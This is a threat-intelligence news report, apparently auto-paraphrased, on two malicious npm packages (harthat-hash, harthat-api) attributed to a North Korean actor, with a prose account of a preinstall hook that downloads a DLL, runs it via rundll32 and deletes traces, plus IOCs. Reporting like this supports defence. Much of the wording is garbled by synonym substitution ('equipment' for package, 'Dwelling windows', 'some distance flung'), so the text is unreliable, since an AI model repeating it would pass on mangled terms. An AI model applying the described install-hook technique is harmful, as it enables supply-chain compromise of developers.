North Korean Hackers Attacking Windows Users With Weaponized npm Files

Scalable equipment scanning within PyPi and npm the utilization of GuardDog instrument known two malicious programs linked to a DPRK-aligned threat actor cluster dubbed “Wired Pungsan.”

The cluster strongly aligns with Microsoft’s MOONSTONE SLEET, indicating an aesthetic provide chain attack vector.

The programs are preliminary entry sides for malware distribution, enabling recordsdata exfiltration, credential theft, and lateral fling within focused environments.

npm user nagasiren978 uploaded two malicious programs, “harthat-hash” and “harthat-api,”  on July seventh, 2024, which downloaded extra malware from a suspected North Korean C2 server.

The server disseminates malicious batch scripts, and a DLL sides to Dwelling windows systems because the intended target, which is per MOONSTONE SLEET, a North Korean threat actor that Microsoft has known.

Two suspicious npm programs, harthat-hash and harthat-api, exhibit malicious behavior by employing a pre-install script to download a malicious DLL from a some distance flung server, attach it the utilization of rundll32, and then self-destruct.

The programs are almost equal excluding for a varied identifier in the download URL, suggesting a advertising and marketing and marketing and marketing campaign concentrated on a pair of victims with doubtlessly diverse payloads.

A malicious npm equipment with the title harthat-api impersonates the legitimate equipment Hardhat by the utilization of names which may maybe well be comparable to these of the legitimate equipment.

Whereas the code originates from the famed node-config repository, the malicious equipment modifies the equipment.json file to steal away the preinstall script and exchange the title to config.

It additionally entails two extra recordsdata, deference.js and pk.json, whose capabilities are no longer analyzed on this excerpt.

The preinstall script maliciously downloads a DLL file disguised as a non eternal file from a some distance flung server, renames it to “equipment.db,” and executes it the utilization of the “rundll32” system utility.

This diagram, is named “System Binary Proxy Execution,” makes an strive to evade detection and then cleans up by deleting the downloaded DLL and restoring the customary “equipment.json” file, masking its malicious job.

The Datadog Security Learn group’s analysis of the malicious DLL printed a reputedly benign binary and not using a apparent malicious performance. It exported two capabilities, undoubtedly one of which, GenerateKeyW, is anticipated to hang malicious code.

Static and dynamic analysis failed to uncover any self-modification or contaminated behavior interior the DLL.

The absence of malicious code suggests that the DLL is either an incomplete or testing model, indicating the threat actor is doubtlessly experimenting with their infrastructure or making an operational error.

In a present attack, threat actors compromised targets by technique of malicious npm programs, harthat-api-v1.3.1.zip, and harthat-hash-v1.3.3.zip, which seemingly contained copied lisp material to appear legitimate.

The malicious payloads were downloaded from IP contend with 142.111.77.196. Capability indicators of compromise (IOCs) contain the filenames Temp.b (on the total is named equipment.db) and its SHA256 hash, d2a74db6b9c900ad29a81432af72eee8ed4e22bf61055e7e8f7a5f1a33778277.